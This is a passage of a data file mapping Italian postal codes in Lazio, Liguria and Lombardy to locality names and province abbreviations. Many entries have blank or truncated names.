["Ronciglione", "VT"]], "01038": [["", "VT"], ["Chia", "VT"]], "01039": [["Vignanello", "VT"]], "01100": [ ["Fastello", "VT"], ["Viterbo", "VT"], ["Tobia", "VT"], ["Magugnano", "VT"], ["", "VT"], ["", "VT"], ["", "VT"], ["Roccalvecce", "VT"], ["Bagnaia", "VT"], ], "16010": [ ["Prelo", "GE"], ["Tiglieto", "GE"], ["Castagna", "GE"], ["Savignone", "GE"], ["Acquasanta", "GE"], ["Rossiglione", "GE"], ["Crocefieschi", "GE"], ["Mele", "GE"], ["Manesseno", "GE"], ["Isorelle", "GE"], ["", "GE"], ["Pedemonte", "GE"], ["Carsi", "GE"], ["Masone", "GE"], ["'", "GE"], ["Valbrevenna", "GE"], ["Sant'Olcese", "GE"], ["Vobbia", "GE"], ["Piccarello", "GE"], ["Mainetto", "GE"], ["'", "GE"], ], "16011": [["", "GE"], ["Arenzano", "GE"]], "16012": [["Busalla", "GE"], ["Sarissola", "GE"], ["Camarza", "GE"]], "16013": [["Campo Ligure", "GE"]], "16014": [ ["Geo", "GE"], ["Langasco", "GE"], ["Isoverde", "GE"], ["Guardia", "GE"], ["Ceranesi", "GE"], ["Pontasso", "GE"], ["Ferriera", "GE"], ["Campomorone", "GE"], ["", "GE"], ], "16015": [["Orero", "GE"], ["Casella", "GE"]], "16016": [["Sciarborasca", "GE"], ["Lerca", "GE"], ["Cogoleto", "GE"]], "16017": [["", "GE"]], "16018": [["Giovi", "GE"], ["Mignanego", "GE"]], "16019": [["Pieve", "GE"], ["", "GE"], ["", "GE"]], "16020": [["Fascia", "GE"], ["Cassingheno", "GE"], ["Gorreto", "GE"], ["Fontanarossa", "GE"]], "16021": [["Bargagli", "GE"]], "16022": [["Davagna", "GE"], ["Moranego", "GE"], ["Scoffera", "GE"], ["Meco", "GE"]], "16023": [["", "GE"], ["Canale", "GE"], ["Fontanigorda", "GE"], ["Casoni", "GE"]], "16024": [["Lumarzo", "GE"]], "16025": [["Rondanina", "GE"], ["", "GE"], ["Montebruno", "GE"]], "16026": [["Trefontane", "GE"], ["Montoggio", "GE"]], "16027": [["Propata", "GE"]], "16028": [["Casanova", "GE"], ["Rovegno", "GE"]], "16029": [["", "GE"], ["Torriglia", "GE"], ["Laccio", "GE"]], "16030": [ ["Zoagli", "GE"], ["Sori", "GE"], ["Sant'Anna", "GE"], ["Capreno", "GE"], ["Uscio", "GE"], ["", "GE"], ["Testana", "GE"], ["Bargone", "GE"], ["Canepa", "GE"], ["Moneglia", "GE"], ["", "GE"], ["Cogorno", "GE"], ["Tribogna", "GE"], ["", "GE"], ["San Salvatore", "GE"], ["", "GE"], ["Avegno", "GE"], ["Velva", "GE"], ], "16031": [["", "GE"], ["Bogliasco", "GE"], ["", "GE"]], "16032": [ ["", "GE"], ["", "GE"], ["", "GE"], ["Camogli", "GE"], ["", "GE"], ["Ruta", "GE"], ], "16033": [["Lavagna", "GE"], ["Cavi", "GE"]], "16034": [["Portofino", "GE"]], "16035": [["", "GE"], ["", "GE"], ["Rapallo", "GE"]], "16036": [["Recco", "GE"]], "16038": [["", "GE"], ["Paraggi", "GE"], ["", "GE"]], "16039": [ ["", "GE"], ["", "GE"], ["", "GE"], ["", "GE"], ], "16040": [ ["Celesia", "GE"], ["Leivi", "GE"], ["San Colombano Certenoli", "GE"], ["", "GE"], ["Calvari", "GE"], ["Piandifieno", "GE"], ["Ognio", "GE"], ["Neirone", "GE"], ["", "GE"], ["Statale", "GE"], ["Ne", "GE"], ["Roccatagliata", "GE"], ["Isolona", "GE"], ["Orero", "GE"], ["Reppia", "GE"], ["Conscenti", "GE"], ["", "GE"], ], "16041": [ ["Giaiette", "GE"], ["", "GE"], ["Bertigaro", "GE"], ["Borzonasca", "GE"], ["Brizzolara", "GE"], ], "16042": [["Carasco", "GE"], ["Rivarola", "GE"], ["Graveglia", "GE"]], "16043": [["", "GE"], ["Chiavari", "GE"], ["Caperana", "GE"]], "16044": [["Cicagna", "GE"], ["Monleone", "GE"]], "16045": [["Lorsica", "GE"]], "16046": [["", "GE"], ["Borgonovo", "GE"], ["", "GE"], ["Mezzanego", "GE"]], "16047": [["Moconesi", "GE"], ["Gattorna", "GE"], ["Ferrada", "GE"]], "16048": [ ["Rezzoaglio", "GE"], ["Priosa", "GE"], ["Parazzuolo", "GE"], ["Magnasco", "GE"], ["Cabanne", "GE"], ["Alpepiana", "GE"], ], "16049": [["Amborzasco", "GE"], ["Allegrezze", "GE"], ["", "GE"]], "16100": [["Genova", "GE"]], "16121": [["Genova", "GE"]], "16122": [["Genova", "GE"]], "16123": [["Genova", "GE"]], "16124": [["Genova", "GE"]], "16125": [["Genova", "GE"]], "16126": [["Genova", "GE"]], "16127": [["Genova", "GE"]], "16128": [["Genova", "GE"]], "16129": [["Genova", "GE"]], "16131": [["Genova", "GE"]], "16132": [["Genova", "GE"]], "16133": [["Genova", "GE"], ["Apparizione", "GE"], ["Bavari", "GE"], ["", "GE"]], "16134": [["Genova", "GE"]], "16135": [["Genova", "GE"]], "16136": [["Genova", "GE"]], "16137": [["Genova", "GE"], ["Staglieno", "GE"]], "16138": [["Genova", "GE"], ["Molassana", "GE"]], "16139": [["Genova", "GE"]], "16141": [["Genova", "GE"], ["Sant'Eusebio", "GE"]], "16142": [["Genova", "GE"]], "16143": [["Genova", "GE"]], "16144": [["Genova", "GE"]], "16145": [["Genova", "GE"]], "16146": [["Genova", "GE"]], "16147": [["Genova", "GE"], ["Sturla", "GE"]], "16148": [["Genova", "GE"], ["", "GE"]], "16149": [["Genova", "GE"], ["Sampierdarena", "GE"]], "16151": [["Genova", "GE"], ["Campasso", "GE"]], "16152": [["", "GE"], ["Coronata", "GE"], ["Genova", "GE"]], "16153": [["Genova", "GE"], ["Borzoli", "GE"]], "16154": [["Genova", "GE"], ["", "GE"], ["", "GE"]], "16155": [["Pegli", "GE"], ["Multedo", "GE"], ["Genova", "GE"]], "16156": [["Genova", "GE"]], "16157": [["Genova", "GE"], ["Pra'", "GE"], ["'", "GE"]], "16158": [["Fabbriche", "GE"], ["Voltri", "GE"], ["Genova", "GE"]], "16159": [["Genova", "GE"], ["", "GE"], ["", "GE"]], "16161": [["Fegino", "GE"], ["Genova", "GE"], ["Teglia", "GE"]], "16162": [["Genova", "GE"], ["Bolzaneto", "GE"]], "16163": [["San Quirico In Val Polcevera", "GE"], ["Genova", "GE"]], "16164": [["Genova", "GE"], ["Pontedecimo", "GE"]], "16165": [["Struppa", "GE"], ["Genova", "GE"]], "16166": [["Genova", "GE"], ["", "GE"]], "16167": [["Genova", "GE"], ["Nervi", "GE"], ["", "GE"]], "18010": [ ["Pietrabruna", "IM"], ["", "IM"], ["", "IM"], ["Carpasio", "IM"], ["", "IM"], ["Cervo", "IM"], ["Terzorio", "IM"], ["Boscomare", "IM"], ["", "IM"], ["Badalucco", "IM"], ["", "IM"], ["", "IM"], ["Triora", "IM"], ], "18011": [["Castellaro", "IM"]], "18012": [ ["Bordighera", "IM"], ["", "IM"], ["", "IM"], ["Seborga", "IM"], ["Vallebona", "IM"], ["'", "IM"], ], "18013": [ ["", "IM"], ["", "IM"], ["", "IM"], ["", "IM"], ], "18014": [["Ospedaletti", "IM"]], "18015": [["", "IM"], ["Pompeiana", "IM"]], "18016": [["", "IM"]], "18017": [ ["", "IM"], ["Cipressa", "IM"], ["Costarainera", "IM"], ["Civezza", "IM"], ["Lingueglietta", "IM"], ], "18018": [["Taggia", "IM"], ["", "IM"]], "18019": [["", "IM"], ["Vallecrosia", "IM"]], "18020": [ ["Caravonica", "IM"], ["Vasia", "IM"], ["Dolcedo", "IM"], ["", "IM"], ["Lucinasco", "IM"], ["", "IM"], ["Aurigo", "IM"], ["Ranzo", "IM"], ["Prela'", "IM"], ], "18021": [["Borgomaro", "IM"]], "18022": [["", "IM"], ["Cesio", "IM"], ["Cartari", "IM"]], "18023": [["", "IM"]], "18024": [["", "IM"], ["Nava", "IM"], ["Pornassio", "IM"]], "18025": [["Mendatica", "IM"], ["", "IM"], ["Piaggia", "CN"], ["", "CN"]], "18026": [ ["Armo", "IM"], ["Calderara", "IM"], ["", "IM"], ["Rezzo", "IM"], ["Vessalico", "IM"], ["Cenova", "IM"], ], "18027": [["Pontedassio", "IM"], ["Chiusanico", "IM"], ["Chiusavecchia", "IM"]], "18030": [ ["Airole", "IM"], ["", "IM"], ["", "IM"], ["", "IM"], ], "18031": [["Bajardo", "IM"]], "18032": [["Perinaldo", "IM"]], "18033": [["", "IM"], ["Camporosso", "IM"]], "18034": [["Ceriana", "IM"]], "18035": [["Dolceacqua", "IM"], ["Isolabona", "IM"], ["Apricale", "IM"]], "18036": [["Soldano", "IM"], ["", "IM"]], "18037": [["Pigna", "IM"]], "18038": [ ["Coldirodi", "IM"], ["", "IM"], ["", "IM"], ["Borello", "IM"], ["", "IM"], ["Bussana", "IM"], ["Poggio", "IM"], ["Verezzo", "IM"], ["", "IM"], ], "18039": [ ["Bevera", "IM"], ["Sealza", "IM"], ["Ventimiglia", "IM"], ["Torri", "IM"], ["Sant'Antonio", "IM"], ["Grimaldi", "IM"], ["", "IM"], ["Calvo", "IM"], ["Latte", "IM"], ["Trucco", "IM"], ["Roverino", "IM"], ], "18100": [ ["Imperia", "IM"], ["Vasia", "IM"], ["Dolcedo", "IM"], ["", "IM"], ["", "IM"], ["Prela'", "IM"], ["Oneglia", "IM"], ["", "IM"], ["", "IM"], ], "19010": [["Torza", "SP"], ["Maissana", "SP"]], "19011": [["Bonassola", "SP"]], "19012": [["Castello", "SP"], ["Carro", "SP"]], "19013": [["", "SP"]], "19014": [["Framura", "SP"]], "19015": [["Levanto", "SP"], ["Montale", "SP"]], "19016": [["", "SP"]], "19017": [["Manarola", "SP"], ["Riomaggiore", "SP"]], "19018": [["Vernazza", "SP"], ["Corniglia", "SP"]], "19020": [ ["Bottagna", "SP"], ["", "SP"], ["", "SP"], ["", "SP"], ["Ponzo'", "SP"], ["Fornola", "SP"], ["Zignago", "SP"], ["", "SP"], ["", "SP"], ["Follo", "SP"], ["Padivarma", "SP"], ["Suvero", "SP"], ["Beverino", "SP"], ["Mattarana", "SP"], ["Valeriano", "SP"], ["Carrodano", "SP"], ["", "SP"], ["", "SP"], ["Bastremoli", "SP"], ["Tivegna", "SP"], ["Valdurasca", "SP"], ["Brugnato", "SP"], ["", "SP"], ["", "SP"], ["Veppo", "SP"], ["", "SP"], ["", "SP"], ["", "SP"], ["Pignone", "SP"], ["Carpena", "SP"], ["", "SP"], ["Prati", "SP"], ["", "SP"], ["Bolano", "SP"], ["Ceparana", "SP"], ["", "SP"], ], "19021": [["", "SP"], ["Arcola", "SP"]], "19025": [ ["Portovenere", "SP"], ["", "SP"], ["", "SP"], ["", "SP"], ["Fezzano", "SP"], ], "19028": [ ["", "SP"], ["", "SP"], ["Scurtabo'", "SP"], ["Comuneglia", "SP"], ["Porciorasco", "SP"], ], "19030": [["Fiumaretta", "SP"]], "19031": [ ["", "SP"], ["Montemarcello", "SP"], ["Ameglia", "SP"], ["", "SP"], ], "19032": [ ["Serra", "SP"], ["Tellaro", "SP"], ["Lerici", "SP"], ["Pugliola", "SP"], ["Fiascherino", "SP"], ["", "SP"], ], "19033": [["Molicciara", "SP"], ["Colombiera", "SP"], ["", "SP"]], "19034": [ ["Luni", "SP"], ["Ortonovo", "SP"], ["Dogana", "SP"], ["", "SP"], ["Casano", "SP"], ["", "SP"], ["Nicola", "SP"], ["Serravalle", "SP"], ], "19037": [["", "SP"], ["", "SP"], ["", "SP"]], "19038": [ ["Sarzana", "SP"], ["Falcinello", "SP"], ["", "SP"], ["Sarzanello", "SP"], ["", "SP"], ["Marinella", "SP"], ["", "SP"], ], "19100": [["", "SP"]], "19121": [["Laspezia", "SP"]], "19122": [["Laspezia", "SP"]], "19123": [["Fabiano", "SP"], ["Chiappa", "SP"], ["Laspezia", "SP"], ["Pegazzano", "SP"]], "19124": [["Laspezia", "SP"], ["", "SP"]], "19125": [["Laspezia", "SP"], ["Migliarina", "SP"]], "19126": [["Isola", "SP"], ["Laspezia", "SP"]], "19131": [["Laspezia", "SP"], ["Cadimare", "SP"]], "19132": [["Marola", "SP"], ["Laspezia", "SP"], ["Campiglia", "SP"]], "19133": [["Biassa", "SP"], ["Laspezia", "SP"]], "19134": [["Laspezia", "SP"], ["Marinasco", "SP"], ["", "SP"]], "19135": [["Laspezia", "SP"], ["San Venerio", "SP"]], "19136": [["Termo", "SP"], ["Laspezia", "SP"], ["Melara", "SP"], ["Limone", "SP"]], "19137": [["Laspezia", "SP"], ["Pitelli", "SP"]], "19138": [["Laspezia", "SP"], ["", "SP"]], "19139": [["Muggiano", "SP"], ["Laspezia", "SP"]], "12071": [["Massimino", "SV"], ["Bagnasco", "CN"]], "17010": [["Osiglia", "SV"], ["Giusvalla", "SV"]], "17011": [["", "SV"], ["", "SV"], ["Ellera", "SV"]], "17012": [["", "SV"]], "17013": [["Murialdo", "SV"], ["Valle", "SV"], ["", "SV"], ["Piano", "SV"]], "17014": [ ["", "SV"], ["Bragno", "SV"], ["", "SV"], ["", "SV"], ["Ferrania", "SV"], ["", "SV"], ], "17015": [["", "SV"]], "17017": [["Roccavignale", "SV"], ["Millesimo", "SV"], ["Cosseria", "SV"]], "17019": [["Alpicella", "SV"], ["Casanova", "SV"], ["Varazze", "SV"], ["Faie", "SV"], ["Pero", "SV"]], "17020": [ ["", "SV"], ["Stellanello", "SV"], ["", "SV"], ["", "SV"], ["Balestrino", "SV"], ["Magliolo", "SV"], ["Testico", "SV"], ["", "SV"], ["Rialto", "SV"], ], "17021": [["Alassio", "SV"], ["Moglio", "SV"]], "17022": [["", "SV"], ["Borgio", "SV"]], "17023": [["Ceriale", "SV"]], "17024": [ ["", "SV"], ["Varigotti", "SV"], ["Feglino", "SV"], ["Finalborgo", "SV"], ["Finale Ligure", "SV"], ["Gorra", "SV"], ], "17025": [["Loano", "SV"]], "17026": [["Noli", "SV"]], "17027": [["Giustenice", "SV"], ["", "SV"]], "17028": [["Bergeggi", "SV"], ["Spotorno", "SV"], ["", "SV"]], "17030": [["Erli", "SV"], ["Castelbianco", "SV"], ["Nasino", "SV"]], "17031": [ ["", "SV"], ["Bastia", "SV"], ["Leca", "SV"], ["Lusignano", "SV"], ["Albenga", "SV"], ["Campochiesa", "SV"], ], "17032": [["Arnasco", "SV"], ["Vendone", "SV"]], "17033": [["Villafranca", "SV"], ["Garlenda", "SV"], ["", "SV"]], "17034": [["", "SV"]], "17035": [["", "SV"]], "17037": [["Pogli", "SV"], ["Onzo", "SV"], ["Ortovero", "SV"]], "17038": [["", "SV"]], "17039": [["Zuccarello", "SV"]], "17040": [["Mioglia", "SV"]], "17041": [["Altare", "SV"], ["Cadibona", "SV"]], "17042": [["", "SV"], ["Giovo", "SV"], ["Pontinvrea", "SV"]], "17043": [["Plodio", "SV"], ["Pallare", "SV"], ["Piani", "SV"], ["Carcare", "SV"]], "17044": [ ["", "SV"], ["San Martella", "SV"], ["", "SV"], ["Stella", "SV"], ["", "SV"], ], "17045": [["Mallare", "SV"], ["Bormida", "SV"]], "17046": [["Sassello", "SV"], ["Palo", "SV"], ["Piampaludo", "SV"]], "17047": [["", "SV"], ["Valleggia", "SV"], ["Quiliano", "SV"]], "17048": [ ["Olba", "SV"], ["", "SV"], ["Vara", "SV"], ["", "SV"], ["", "SV"], ["Urbe", "SV"], ], "17051": [["Andora", "SV"], ["", "SV"]], "17052": [["", "SV"]], "17053": [["Laigueglia", "SV"]], "17054": [["Boissano", "SV"]], "17055": [["Toirano", "SV"]], "17056": [["Cengio", "SV"]], "17057": [["Calizzano", "SV"], ["Bardineto", "SV"], ["Caragna", "SV"]], "17058": [["", "SV"], ["Dego", "SV"]], "17100": [ ["Savona", "SV"], ["Santuario", "SV"], ["", "SV"], ["Zinola", "SV"], ["Legino", "SV"], ["Lavagnola", "SV"], ["Fornaci", "SV"], ], "24010": [ ["Dossena", "BG"], ["Vedeseta", "BG"], ["", "BG"], ["Ubiale", "BG"], ["", "BG"], ["Valleve", "BG"], ["Ubiale Clanezzo", "BG"], ["Branzi", "BG"], ["Muggiasca", "BG"], ["Valnegra", "BG"], ["Colla", "BG"], ["", "BG"], ["Piazzatorre", "BG"], ["Roncobello", "BG"], ["Piazzolo", "BG"], ["Carona", "BG"], ["Cusio", "BG"], ["", "BG"], ["Peghera", "BG"], ["Ornica", "BG"], ["Cassiglio", "BG"], ["Foppolo", "BG"], ["", "BG"], ["Ponteranica", "BG"], ["Sorisole", "BG"], ["Mezzoldo", "BG"], ["Clanezzo", "BG"], ["", "BG"], ["Botta", "BG"], ["", "BG"], ["Bordogna", "BG"], ["Algua", "BG"], ["Petosino", "BG"], ["Taleggio", "BG"], ["Valtorta", "BG"], ["Averara", "BG"], ["Fondra", "BG"], ["Olda", "BG"], ["Lenna", "BG"], ["Bracca", "BG"], ["Blello", "BG"], ["Sedrina", "BG"], ], "24011": [["Alme'", "BG"]], "24012": [ ["Laxolo", "BG"], ["", "BG"], ["Gerosa", "BG"], ["Brembilla", "BG"], ["", "BG"], ], "24013": [["", "BG"]], "24014": [["", "BG"]], "24015": [["", "BG"]], "24016": [["", "BG"], ["", "BG"]], "24017": [["Cornalba", "BG"], ["Serina", "BG"]], "24018": [["'", "BG"]], "24019": [["Poscante", "BG"], ["Spino", "BG"], ["Zogno", "BG"], ["Ambria", "BG"]], "24020": [ ["Selvino", "BG"], ["Bondione", "BG"], ["", "BG"], ["Negrone", "BG"], ["Cene", "BG"], ["Casnigo", "BG"], ["Piario", "BG"], ["Ardesio", "BG"], ["Gorle", "BG"], ["Parre", "BG"], ["Songavazzo", "BG"], ["Fiumenero", "BG"], ["", "BG"], ["Dezzo", "BG"], ["Valgoglio", "BG"], ["", "BG"], ["", "BG"], ["Ranica", "BG"], ["Boario", "BG"], ["Premolo", "BG"], ["Peia", "BG"], ["Cerete", "BG"], ["Oneta", "BG"], ["", "BG"], ["Rovetta", "BG"], ["Gorno", "BG"], ["Aviatico", "BG"], ["Scanzorosciate", "BG"], ["Gavarno", "BG"], ["", "BG"], ["", "BG"], ["Pradalunga", "BG"], ["Onore", "BG"], ["Gromo", "BG"], ["Valbondione", "BG"], ["Bratto", "BG"], ["Gandellino", "BG"], ["Colzate", "BG"], ["Vilminore", "BG"], ["Scanzo", "BG"], ["", "BG"], ["Azzone", "BG"], ["", "BG"], ["", "BG"], ["", "BG"], ["Colere", "BG"], ["Schilpario", "BG"], ["", "BG"], ["Tribulina", "BG"], ["Villassio", "BG"], ["", "BG"], ["Rosciate", "BG"], ["Lizzola", "BG"], ["Cornale", "BG"], ], "24021": [ ["Comenduno", "BG"], ["Abbazia", "BG"], ["Albino", "BG"], ["Vall'Alta", "BG"], ["", "BG"], ["", "BG"], ], "24022": [["", "BG"], ["Nese", "BG"]], "24023": [["Clusone", "BG"]], "24024": [["Gandino", "BG"]], "24025": [["Orezzo", "BG"], ["Gazzaniga", "BG"]], "24026": [["", "BG"], ["Leffe", "BG"]], "24027": [["", "BG"], ["Nembro", "BG"]], "24028": [["", "BG"]], "24029": [["Vertova", "BG"]], "24030": [ ["Camoneone", "BG"], ["Paladina", "BG"], ["", "BG"], ["", "BG"], ["Crocette", "BG"], ["Valbrembo", "BG"], ["Strozza", "BG"], ["Mapello", "BG"], ["Celana", "BG"], ["Berbenno", "BG"], ["", "BG"], ["Capizzone", "BG"], ["", "BG"], ["Caprino", "BG"], ["Ambivere", "BG"], ["", "BG"], ["Presezzo", "BG"], ["", "BG"], ["Mozzo", "BG"], ["Carvico", "BG"], ["Barzana", "BG"], ["Roncola", "BG"], ["Medolago", "BG"], ["Solza", "BG"], ["Bedulita", "BG"], ["Sant'Antonio", "BG"], ["Pontida", "BG"], ["", "BG"], ["Locatello", "BG"], ["", "BG"], ["Gromlongo", "BG"], ["", "BG"], ["Palazzago", "BG"], ["", "BG"], ], "24031": [["", "BG"]], "24033": [["", "BG"]], "24034": [["", "BG"]], "24035": [["Curno", "BG"]], "24036": [["", "BG"]], "24037": [["", "BG"], ["Brumano", "BG"], ["Frontale", "BG"], ["Calchera", "BG"]], "24038": [["Mazzoleni", "BG"], ["", "BG"], ["Valsecca", "BG"], ["", "BG"]], "24039": [["Sotto Il ", "BG"], ["", "BG"]], "24040": [ ["Suisio", "BG"], ["Lallio", "BG"], ["", "BG"], ["", "BG"], ["Isso", "BG"], ["", "BG"], ["Arcene", "BG"], ["", "BG"], ["Madone", "BG"], ["Boltiere", "BG"], ["Zingonia", "BG"], ["Levate", "BG"], ["", "BG"], ["", "BG"], ["", "BG"], ["Bottanuco", "BG"], ["Filago", "BG"], ["", "BG"], ["", "BG"], ["Verdellino", "BG"], ["Ghiaie", "BG"], ["Stezzano", "BG"], ["Calvenzano", "BG"], ["", "BG"], ["Pognano", "BG"], ["", "BG"], ["Ciserano", "BG"], ["", "BG"], ["", "BG"], ["Pagazzano", "BG"], ["Barbata", "BG"], ], "24041": [["Brembate", "BG"], ["Grignano", "BG"]], "24042": [["", "BG"], ["", "BG"], ["", "BG"]], "24043": [["Vidalengo", "BG"], ["Caravaggio", "BG"], ["Masano", "BG"]], "24044": [["Dalmine", "BG"], ["Sforzatica", "BG"], ["", "BG"]], "24045": [["Badalasco", "BG"], ["", "BG"]], "24046": [["", "BG"]], "24047": [["Geromina", "BG"], ["Treviglio", "BG"], ["Castel Cerreto", "BG"]], "24048": [["Treviolo", "BG"]], "24049": [["Verdello", "BG"]], "24050": [ ["Bariano", "BG"], ["", "BG"], ["Mozzanica", "BG"], ["Cortenuova", "BG"], ["Lurano", "BG"], ["Malpaga", "BG"], ["Cavernago", "BG"], ["Pumenengo", "BG"], ["Zanica", "BG"], ["Palosco", "BG"], ["", "BG"], ["Calcinate", "BG"], ["", "BG"], ["Ghisalba", "BG"], ["Grassobbio", "BG"], ["Covo", "BG"], ["Morengo", "BG"], ["", "BG"], ["Spirano", "BG"], ], "24051": [["Antegnate", "BG"]], "24052": [["", "BG"]], "24053": [["", "BG"]], "24054": [["Calcio", "BG"]], "24055": [["", "BG"]], "24056": [["Fontanella", "BG"]], "24057": [["Martinengo", "BG"]], "24058": [ ["", "BG"], ["", "BG"], ["", "BG"], ["Sola", "BG"], ], "24059": [["Basella", "BG"], ["Urgnano", "BG"]], "24060": [ ["", "BG"], ["Viadanica", "BG"], ["Sovere", "BG"], ["", "BG"], ["Credaro", "BG"], ["Ranzanico", "BG"], ["Casco", "BG"], ["", "BG"], ["Bianzano", "BG"], ["Endine", "BG"], ["Gorlago", "BG"], ["Bossico", "BG"], ["Chiuduno", "BG"], ["Monasterolo", "BG"], ["", "BG"], ["Entratico", "BG"], ["", "BG"], ["Telgate", "BG"], ["Pianico", "BG"], ["", "BG"], ["Villongo", "BG"], ["Zandobbio", "BG"], ["Parzanica", "BG"], ["", "BG"], ["Rogno", "BG"], ["", "BG"], ["Brusaporto", "BG"], ["", "BG"], ["Cividino", "BG"], ["", "BG"], ["", "BG"], ["", "BG"], ["Casazza", "BG"], ["", "BG"], ["Piangaiano", "BG"], ["", "BG"], ["Celatica", "BG"], ["Vigolo", "BG"], ["Grone", "BG"], ["Predore", "BG"], ["Tolari", "BG"], ["", "BG"], ["Montello", "BG"], ["Gandosso", "BG"], ["", "BG"], ["", "BG"], ["Bolgare", "BG"], ["Fonteno", "BG"], ["", "BG"], ["Bagnatica", "BG"], ["", "BG"], ["", "BG"], ], "24061": [["", "BG"]], "24062": [["", "BG"]], "24063": [["Castro", "BG"], ["", "BG"]], "24064": [["", "BG"]], "24065": [["Lovere", "BG"]], "24066": [["Pedrengo", "BG"]], "24067": [["Sarnico", "BG"]], "24068": [["Seriate", "BG"], ["Cassinone", "BG"]], "24069": [["Cenate Di Sotto", "BG"], ["Luzzana", "BG"], ["Cenate Sotto", "BG"], ["", "BG"]], "24100": [["Bergamo", "BG"]], "24121": [["Bergamo", "BG"]], "24122": [["Bergamo", "BG"]], "24123": [["Bergamo", "BG"], ["Valtesse", "BG"]], "24124": [["Redona", "BG"], ["Bergamo", "BG"]], "24125": [["Boccaleone", "BG"], ["Bergamo", "BG"]], "24126": [["Colognola Al Piano", "BG"], ["Malpensata", "BG"], ["Campagnola", "BG"], ["Bergamo", "BG"]], "24127": [["Bergamo", "BG"]], "24128": [["Bergamo", "BG"], ["Loreto", "BG"]], "24129": [["Bergamo", "BG"], ["Longuelo", "BG"]], "25010": [ ["", "BS"], ["", "BS"], ["Visano", "BS"], ["", "BS"], ["Acquafredda", "BS"], ["", "BS"], ["Isorella", "BS"], ["", "BS"], ["", "BS"], ["Campione", "BS"], ["Rivoltella", "BS"], ["Tremosine", "BS"], ["", "BS"], ["Remedello", "BS"], ["Pozzolengo", "BS"], ["Montirone", "BS"], ["Vesio", "BS"], ["Borgosatollo", "BS"], ], "25011": [["Calcinatello", "BS"], ["Calcinato", "BS"], ["", "BS"]], "25012": [["Viadana", "BS"], ["Calvisano", "BS"], ["Malpaga", "BS"], ["Mezzane", "BS"]], "25013": [["Carpenedolo", "BS"]], "25014": [["Capodimonte", "BS"], ["Castenedolo", "BS"]], "25015": [["", "BS"]], "25016": [["Ghedi", "BS"]], "25017": [["Lonato", "BS"], ["Sedena", "BS"], ["Centenaro", "BS"], ["Esenta", "BS"]], "25018": [["Vighizzolo", "BS"], ["Sant'Antonio", "BS"], ["Montichiari", "BS"], ["Novagli", "BS"]], "25019": [["", "BS"], ["Sirmione", "BS"]], "25020": [ ["Scarpizzolo", "BS"], ["Cignano", "BS"], ["Offlaga", "BS"], ["Gambara", "BS"], ["", "BS"], ["Cigole", "BS"], ["Faverzano", "BS"], ["Poncarale", "BS"], ["", "BS"], ["", "BS"], ["", "BS"], ["Fiesse", "BS"], ["Milzano", "BS"], ["", "BS"], ["Flero", "BS"], ["Pralboino", "BS"], ["", "BS"], ["Quinzanello", "BS"], ["Seniga", "BS"], ["", "BS"], ["Alfianello", "BS"], ["Dello", "BS"], ], "25021": [["", "BS"]], "25022": [["", "BS"], ["Motella", "BS"], ["Farfengo", "BS"], ["Padernello", "BS"]], "25023": [["Gottolengo", "BS"]], "25024": [["Castelletto", "BS"], ["", "BS"], ["Porzano", "BS"], ["Leno", "BS"]], "25025": [["Manerbio", "BS"]], "25026": [["Pontevico", "BS"]], "25027": [["", "BS"]], "25028": [["Verolanuova", "BS"], ["Cadignano", "BS"]], "25029": [["Verolavecchia", "BS"]], "25030": [ ["Longhena", "BS"], ["Pievedizio", "BS"], ["Pompiano", "BS"], ["Mairano", "BS"], ["Ludriano", "BS"], ["Roncadelle", "BS"], ["Barbariga", "BS"], ["", "BS"], ["Brandico", "BS"], ["Berlingo", "BS"], ["Erbusco", "BS"], ["Castelcovati", "BS"], ["Torbiato", "BS"], ["Castrezzato", "BS"], ["Roccafranca", "BS"], ["Maclodio", "BS"], ["", "BS"], ["Rudiano", "BS"], ["Cossirano", "BS"], ["Paratico", "BS"], ["", "BS"], ["Lograto", "BS"], ["", "BS"], ["Villachiara", "BS"], ["Zocco", "BS"], ["Orzivecchi", "BS"], ["", "BS"], ["Comezzano", "BS"], ["Cizzago", "BS"], ["Coccaglio", "BS"], ["Trenzano", "BS"], ["Corzano", "BS"], ["Adro", "BS"], ], "25031": [["Capriolo", "BS"]], "25032": [["Chiari", "BS"]], "25033": [["Cologne", "BS"]], "25034": [["Orzinuovi", "BS"], ["Coniolo", "BS"]], "25035": [["Ospitaletto", "BS"]], "25036": [["", "BS"], ["", "BS"]], "25037": [["Pontoglio", "BS"]], "25038": [["Duomo", "BS"], ["Sant'Andrea", "BS"], ["Rovato", "BS"], ["Lodetto", "BS"], ["Sant'Anna", "BS"]], "25039": [["Travagliato", "BS"]], "25040": [ ["", "BS"], ["Cerveno", "BS"], ["Badetto", "BS"], ["Plemo", "BS"], ["Incudine", "BS"], ["", "BS"], ["Lozio", "BS"], ["", "BS"], ["", "BS"], ["Galleno", "BS"], ["Borgonato", "BS"], ["Nigoline", "BS"], ["Malonno", "BS"], ["Bienno", "BS"], ["Artogne", "BS"], ["", "BS"], ["Timoline", "BS"], ["Monno", "BS"], ["Bonomelli", "BS"], ["", "BS"], ["Sacca", "BS"], ["Cevo", "BS"], ["", "BS"], ["Prestine", "BS"], ["Gianico", "BS"], ["Colombaro", "BS"], ["Braone", "BS"], ["Esine", "BS"], ["Santicolo", "BS"], ["", "BS"], ["", "BS"], ["", "BS"], ["Ceto", "BS"], ["", "BS"], ["", "BS"], ], "25041": [["", "BS"], ["Erbanno", "BS"]], "25042": [["Borno", "BS"]], "25043": [["Astrio", "BS"], ["Pescarzo", "BS"], ["Breno", "BS"]], "25044": [["", "BS"]], "25045": [["Castegnato", "BS"]], "25046": [["Bornato", "BS"], ["", "BS"], ["Calino", "BS"], ["Pedrocca", "BS"]], "25047": [["Gorzone", "BS"], ["", "BS"], ["Darfo", "BS"]], "25048": [["Cortenedolo", "BS"], ["Edolo", "BS"], ["Sonico", "BS"]], "25049": [["Pilzone", "BS"], ["Iseo", "BS"], ["Clusane", "BS"]], "25050": [ ["", "BS"], ["Provezze", "BS"], ["Temu'", "BS"], ["Stadolina", "BS"], ["Zone", "BS"], ["Camignone", "BS"], ["", "BS"], ["", "BS"], ["Sellero", "BS"], ["Vione", "BS"], ["", "BS"], ["", "BS"], ["Ossimo", "BS"], ["Novelle", "BS"], ["Fontane", "BS"], ["", "BS"], ["Crist", "BS"], ["", "BS"], ["Pontagna", "BS"], ["Cimbergo", "BS"], ["Zurane", "BS"], ["Siviano", "BS"], ["", "BS"], ["Monterotondo", "BS"], ["Passirano", "BS"], ["", "BS"], ["Ome", "BS"], ["Niardo", "BS"], ["Gresine", "BS"], ["", "BS"], ["", "BS"], ["Paspardo", "BS"], ["Losine", "BS"], ], "25051": 